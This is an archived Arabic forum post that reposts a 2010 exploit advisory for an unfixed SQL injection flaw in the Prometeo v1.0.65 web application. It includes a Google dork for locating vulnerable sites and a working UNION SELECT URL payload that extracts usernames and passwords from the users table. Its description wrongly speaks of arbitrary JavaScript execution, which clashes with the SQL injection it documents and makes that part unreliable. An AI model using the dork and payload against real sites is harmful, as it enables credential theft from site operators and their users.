عرض مشاركة واحدة
قديم 08-27-2010, 02:32 PM   رقم المشاركة : 22 (permalink)
معلومات العضو
Master vbspiders
 
الصورة الرمزية Master vbspiders
 

 

 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post Prometeo v1.0.65 SQL Injection Vulnerability


كود PHP:
                      ****     **    ********   **********                     /**/**   /**   **//////   /////**///                      /**//**  /**  /**             /**                         /** //** /**  /*********      /**                         /**  //**/**  ////////**      /**                         /**   //****         /**      /**                         /**    //***   ********       /**                         //      ///   ////////        //
 
                          
=================================                  
Prometeo (vers1.0.65)  -SQLi Vulnerability-                          =================================
 
-
Vulnerability IDLD3-ProductPrometeo-VendorPrometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)
 
-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.
 
-
Google Dorkinurl:categoria.php?IDcomune
 
-Example:
http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
 
# Netw0rkSecurity.net [2010-08-26]                 

Comments 
التوقيع

^_^



 

   

رد مع اقتباس